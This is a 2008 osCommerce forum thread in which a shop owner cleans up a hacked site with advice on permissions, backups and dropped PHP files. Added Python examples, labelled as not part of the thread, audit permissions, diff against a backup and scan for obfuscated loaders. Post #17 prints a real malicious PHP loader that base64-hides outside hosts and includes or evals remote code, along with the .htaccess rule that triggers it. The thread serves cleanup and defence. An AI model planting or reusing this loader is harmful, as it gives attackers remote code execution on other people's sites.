
Site getting Hacked


22 replies to this topic

#1 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 28 October 2008, 15:41

My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read.
Thanks
Jim

#2 php_Guy

  • Community Member
  • 179 posts
  • Real Name:Some Guy
  • Gender:Male
  • Location:Corvallis, OR

Posted 28 October 2008, 16:17

Forestshopkeeper, on Oct 28 2008, 08:41 AM, said:

My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read.
Thanks
Jim

Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built-in password protection for admin. Use .htpasswd. You can set it up manually or through your cPanel.

Also be sure to install these mods

That should take care of the problem.

Edited by php_Guy, 28 October 2008, 16:18.


#3 germ

  • Community Member
  • 13,471 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 28 October 2008, 16:25

Your images folder still has hack PHP files in it (looks to me like).

If it's set at 777 permissions, there's probably your weak point.

Folder permissions should not be higher than 755.

File permissions probably not higher than 644.
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help

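A way to check the whole tree for the 755/644 rule germ and php_Guy give, rather than clicking through each folder in cPanel. This is an added example, not code from the thread or from osCommerce; the sample tree it builds is constructed, and it assumes a Unix host where the script runs as the account that owns the site.

```python
"""Permission audit for a web root: directories 0755, files 0644.
Added example, not from the thread or osCommerce; the sample tree is constructed."""
import os
import stat
import tempfile

DIR_MODE = 0o755   # rwxr-xr-x: owner writes, everyone else only reads/traverses
FILE_MODE = 0o644  # rw-r--r--


def audit_modes(root, fix=False):
    """Return sorted (relative_path, current_mode, expected_mode) for every
    directory or file under root whose permission bits deviate from the target.
    With fix=True each offending entry is chmod'ed to the expected mode.
    Symlinks are skipped so a link pointing out of the web root is never chmod'ed through."""
    entries = [(root, DIR_MODE)]  # the root directory itself is reported as '.'
    for dirpath, dirnames, filenames in os.walk(root):
        entries += [(os.path.join(dirpath, d), DIR_MODE) for d in dirnames]
        entries += [(os.path.join(dirpath, f), FILE_MODE) for f in filenames]
    findings = []
    for path, expected in entries:
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            continue
        current = stat.S_IMODE(st.st_mode)
        if current != expected:
            findings.append((os.path.relpath(path, root), current, expected))
            if fix:
                os.chmod(path, expected)
    return sorted(findings)


def world_writable(findings):
    """The subset that any local user (including a neighbouring account on a
    shared host) can write to: the 777 images folder from the thread lands here."""
    return [f for f in findings if f[1] & stat.S_IWOTH]


def build_sample_tree():
    """Constructed fixture mirroring the thread: an images folder left at 777 and an
    admin file at 666, next to correctly permissioned entries."""
    root = tempfile.mkdtemp(prefix="shop-")
    os.chmod(root, DIR_MODE)
    layout = {
        "images": (None, 0o777),
        "images/logo.gif": (b"GIF89a", 0o644),
        "admin": (None, 0o755),
        "admin/index.php": (b"<?php // constructed placeholder\n", 0o666),
        "index.php": (b"<?php // constructed placeholder\n", 0o644),
    }
    for rel, (content, mode) in layout.items():
        path = os.path.join(root, rel)
        if content is None:
            os.mkdir(path)
        else:
            with open(path, "wb") as fh:
                fh.write(content)
        os.chmod(path, mode)  # set explicitly so the umask does not interfere
    return root


def describe(findings):
    return ["%s: %04o -> %04o" % (p, cur, exp) for p, cur, exp in findings]


if __name__ == "__main__":
    site = build_sample_tree()
    print("\n".join(describe(audit_modes(site))))   # report only
    audit_modes(site, fix=True)                       # then repair
    print("after fix:", audit_modes(site))
```

Run it report-only first and read the list before passing fix=True: a few files may need other modes on purpose. With shell access the report-only half is `find /path/to/site -type d ! -perm 755` and `find /path/to/site -type f ! -perm 644`, and the entries that matter most on a shared host are `find /path/to/site -perm -o+w`.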

#4 php_Guy

  • Community Member
  • 179 posts
  • Real Name:Some Guy
  • Gender:Male
  • Location:Corvallis, OR

Posted 28 October 2008, 16:38

After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.
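The comparison php_Guy describes, done by content hash instead of by eye: everything in the live tree that is not in the backup, everything missing from it, and everything whose bytes changed. This is an added example, not code from the thread or from osCommerce; both trees it compares are constructed, and it assumes the backup was taken before the first compromise (the "known-good" copy), since a backup taken afterwards would hide the dropped files.

```python
"""Compare a live web root with a known-good backup and report files that appeared,
disappeared or changed. Added example, not from the thread or osCommerce;
the two sample trees are constructed."""
import hashlib
import os
import tempfile


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def _snapshot(root):
    """Map every regular file under root (relative path) to its content hash."""
    snap = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            snap[os.path.relpath(full, root)] = _sha256(full)
    return snap


def compare_trees(live_root, backup_root):
    """Return {'added', 'removed', 'modified'}: files only in live (dropped scripts),
    only in backup (deleted files), or in both with different content
    (the repeatedly altered index file from the thread)."""
    live, backup = _snapshot(live_root), _snapshot(backup_root)
    both = set(live) & set(backup)
    return {
        "added": sorted(set(live) - set(backup)),
        "removed": sorted(set(backup) - set(live)),
        "modified": sorted(p for p in both if live[p] != backup[p]),
    }


def _write_tree(root, files):
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)


def build_sample_trees():
    """Constructed fixture: the backup is clean; the live copy has an altered
    index.php, a script dropped into images/, and one file missing."""
    clean = {
        "index.php": b"<?php // constructed storefront entry point\n",
        "images/logo.gif": b"GIF89a",
        "includes/configure.php": b"<?php // constructed config\n",
    }
    hacked = dict(clean)
    hacked["index.php"] = clean["index.php"] + b"<!-- constructed: unexpected change -->\n"
    hacked["images/8675309.php"] = b"<?php // constructed stand-in for a dropped script\n"
    del hacked["includes/configure.php"]
    backup_root = tempfile.mkdtemp(prefix="backup-")
    live_root = tempfile.mkdtemp(prefix="live-")
    _write_tree(backup_root, clean)
    _write_tree(live_root, hacked)
    return live_root, backup_root


if __name__ == "__main__":
    live, backup = build_sample_trees()
    for kind, paths in compare_trees(live, backup).items():
        print(kind, paths)
```

Every entry in "added" is a candidate dropped file and every entry in "modified" needs a look before the site is trusted again; "removed" is usually the owner's own cleanup but is listed so nothing is lost silently. On a host with shell access `diff -rq /path/to/backup /path/to/live` produces the same three lists, and the hash approach works when the backup lives on the owner's PC and only the hash list is copied to the server.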

#5 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 28 October 2008, 22:20

germ, on Oct 28 2008, 10:25 AM, said:

Your images folder still has hack PHP files in it (looks to me like).

If it's set at 777 permissions, there's probably your weak point.

Folder permissions should not be higher than 755.

File permissions probably not higher than 644.

Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referencing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.
Jim

#6 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 28 October 2008, 22:21

php_Guy, on Oct 28 2008, 10:17 AM, said:

Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built-in password protection for admin. Use .htpasswd. You can set it up manually or through your cPanel.

Also be sure to install these mods

That should take care of the problem.

Thanks. I am working on the mods. I set the folders at 755. Files are 644.
Jim

#7 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 28 October 2008, 22:23

php_Guy, on Oct 28 2008, 10:38 AM, said:

After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.

Thanks for the info.
Jim

#8 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 28 October 2008, 22:48

Forestshopkeeper, on Oct 28 2008, 04:20 PM, said:

Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referencing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.
Jim

Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777
Jim

#9 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 28 October 2008, 22:49

Forestshopkeeper, on Oct 28 2008, 04:21 PM, said:

Thanks. I am working on the mods. I set the folders at 755. Files are 644.
Jim

Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777
Jim

#10 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 28 October 2008, 23:11

Forestshopkeeper, on Oct 28 2008, 04:21 PM, said:

Thanks. I am working on the mods. I set the folders at 755. Files are 644.
Jim

Is there any particular order to put in these mods? Do I need all of them? Are there any known conflicts between them?
Jim

#11 Vger

  • Community Member
  • 16,978 posts
  • Real Name:R Anthony
  • Gender:Not Telling

Posted 28 October 2008, 23:23

If your images folder does not allow uploads unless set to 777, then do that, but just for the upload, and then reset to 755.

Either that or get your hosting company to sort out their security.

Vger

#12 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 29 October 2008, 00:29

Vger, on Oct 28 2008, 05:23 PM, said:

If your images folder does not allow uploads unless set to 777, then do that, but just for the upload, and then reset to 755.

Either that or get your hosting company to sort out their security.

Vger

That makes sense for now till I can sort it out.
Jim

#13 germ

  • Community Member
  • 13,471 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 29 October 2008, 00:32

Recheck your images folder for hack PHP files:

 019667.php			  23-May-2008 22:30	 1k  
 1019667.php			 24-Aug-2008 01:55	 1k  
 19667.php			   20-Mar-2008 02:59	 1k


#14 php_Guy

  • Community Member
  • 179 posts
  • Real Name:Some Guy
  • Gender:Male
  • Location:Corvallis, OR

Posted 29 October 2008, 01:05

I generally find it easier to upload images via FTP and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755.

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php.

Good luck

#15 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 29 October 2008, 01:51

germ, on Oct 28 2008, 06:32 PM, said:

Recheck your images folder for hack PHP files:

 019667.php			  23-May-2008 22:30	 1k  
 1019667.php			 24-Aug-2008 01:55	 1k  
 19667.php			   20-Mar-2008 02:59	 1k

Thanks. I don't know where they came from, but they are gone now.
Jim

#16 germ

  • Community Member
  • 13,471 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 29 October 2008, 01:57

They look like the same type of hack that got me last March.

If so, it's neither a destructive nor an information-stealing type of hack.

It's a "pay per click" scam.

They stick these bogus PHP files around, then seed search engines with links to them, then just sit back and rake in the dough (so I've been told).

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.

Just be sure all the folder permissions are no higher than 755 and keep an eye on things for a while.

If no more hack files show up, you should be OK.

By the way, better check your admin folder too, especially your backups folder for your database.

They got me there, too.
:blush:

#17 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 29 October 2008, 02:43

php_Guy, on Oct 28 2008, 07:05 PM, said:

I generally find it easier to upload images via FTP and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755.

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php.

Good luck

I am looking at some .htaccess files in my admin folder:

This script is in a file called 220009.php

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>

This is what is in the .htaccess file in my backups folder

Options -MultiViews
ErrorDocument 404 //admin/backups/220009.php


In 2007 I did not even have a backups folder, and now I send everything to my computer. I am pulling these files for now and setting the permissions to 755 on these folders.

What else can I do?
Jim
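This covers germ's "recheck your images folder", php_Guy's "check all your .htaccess files" and the pair of files Jim found in admin/backups. The scan looks for three things: PHP (by extension, or by a leading `<?` so a script renamed to .gif is still caught) inside directories that should hold only images or backups; .htaccess rules that hand requests to a script (an ErrorDocument pointing at a .php file, as in the post above, plus AddHandler/SetHandler and auto_prepend_file rules); and scripts that combine base64_decode with include or eval, with the literals decoded so the hidden hostnames can be read and blocked. This is an added example, not code from the thread or from osCommerce; the list of data-only directories and the sample site are constructed, and the decoded hostname in the fixture is a placeholder.

```python
"""Scan a web root for PHP in data-only directories, .htaccess rules that route
requests to a script, and base64-obfuscated loaders. Added example, not from the
thread or osCommerce; DATA_ONLY_DIRS and the sample site are constructed."""
import base64
import os
import re
import tempfile

# Directories that hold data, never code, in the shop layout discussed above (assumption).
DATA_ONLY_DIRS = {"images", "backups"}
CODE_EXTS = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".inc")

# Rules that make Apache hand a request to a script: the thread's 404 handler,
# extra extensions mapped to the PHP handler, or a file silently prepended to every page.
HTACCESS_RE = re.compile(
    r"^[ \t]*(ErrorDocument[ \t]+\d{3}[ \t]+\S*\.php\S*"
    r"|(?:Add|Set)Handler\b.*php"
    r"|php_(?:value|flag)[ \t]+auto_(?:prepend|append)_file\b.*)",
    re.IGNORECASE | re.MULTILINE,
)
OBFUSC_RE = re.compile(r"base64_decode\s*\(", re.IGNORECASE)
LOADER_RE = re.compile(r"\b(?:eval|assert|include|include_once|require|require_once)\s*\(", re.IGNORECASE)
B64_LITERAL_RE = re.compile(r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")


def _read(path):
    with open(path, "rb") as fh:
        return fh.read().decode("utf-8", "replace")


def is_php_file(path):
    """Judge by extension first, then by content, so a script renamed to .gif is still caught."""
    if path.lower().endswith(CODE_EXTS):
        return True
    with open(path, "rb") as fh:
        head = fh.read(64).lstrip()
    return head.startswith(b"<?") and not head.startswith(b"<?xml")


def decode_literals(text):
    """Decode every base64_decode("...") string literal so the hidden hostnames are readable."""
    decoded = []
    for literal in B64_LITERAL_RE.findall(text):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass  # not valid base64 after all
    return decoded


def scan_site(root):
    """Return sorted (relative_path, reason, detail) findings for everything under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if os.path.islink(path):
                continue
            if name == ".htaccess":
                for m in HTACCESS_RE.finditer(_read(path)):
                    findings.append((rel, "htaccess-routes-to-script", m.group(0).strip()))
                continue
            if not is_php_file(path):
                continue
            if DATA_ONLY_DIRS.intersection(rel.split(os.sep)[:-1]):
                findings.append((rel, "php-in-data-dir", ""))
            text = _read(path)
            if OBFUSC_RE.search(text) and LOADER_RE.search(text):
                findings.append((rel, "obfuscated-loader", "; ".join(decode_literals(text))))
    return sorted(findings)


def _b64(s):
    return base64.b64encode(s.encode()).decode()


def build_sample_site():
    """Constructed fixture; the loader only names a placeholder host and is never executed."""
    loader = ('<?php error_reporting(0); $u = base64_decode("%s") . base64_decode("%s");'
              ' include($u . "/?x"); ?>\n') % (_b64("http://"), _b64("placeholder.invalid"))
    files = {
        "index.php": "<?php // constructed entry point\ninclude('includes/application_top.php');\n",
        "images/logo.gif": "GIF89a",
        "images/8675309.php": "<?php // constructed stand-in for a dropped script ?>\n",
        "images/banner.gif": "<?php // constructed: script hiding behind an image extension ?>\n",
        "admin/backups/.htaccess": "Options -MultiViews\nErrorDocument 404 //admin/backups/rogue.php\n",
        "admin/backups/rogue.php": loader,
    }
    root = tempfile.mkdtemp(prefix="site-")
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, reason, detail in scan_site(build_sample_site()):
        print("%-28s %-26s %s" % (rel, reason, detail))
```

The rules are heuristics: a legitimate contribution that happens to use base64_decode will show up, so treat the output as a list to review rather than a list to delete, and add any other upload or data directories the shop uses to DATA_ONLY_DIRS. The shell equivalents for the first two checks are `find images admin/backups -type f -name '*.php'` and `find . -name .htaccess -exec grep -Hn ErrorDocument {} +`; the decoded hostnames from the third are what to block at the firewall and search for in the access log.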

#18 germ

  • Community Member
  • 13,471 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 29 October 2008, 02:48

Both of the files you posted about in the backups folder are bad. Delete them.

#19 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 29 October 2008, 20:18

germ, on Oct 28 2008, 08:48 PM, said:

Both of the files you posted about in the backups folder are bad. Delete them.

Thanks.
I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today.
Jim

#20 Forestshopkeeper

  • Community Member
  • 127 posts
  • Real Name:James Belk

Posted 03 November 2008, 20:25

Forestshopkeeper, on Oct 29 2008, 01:18 PM, said:

Thanks.
I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today.
Jim

Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder.
Jim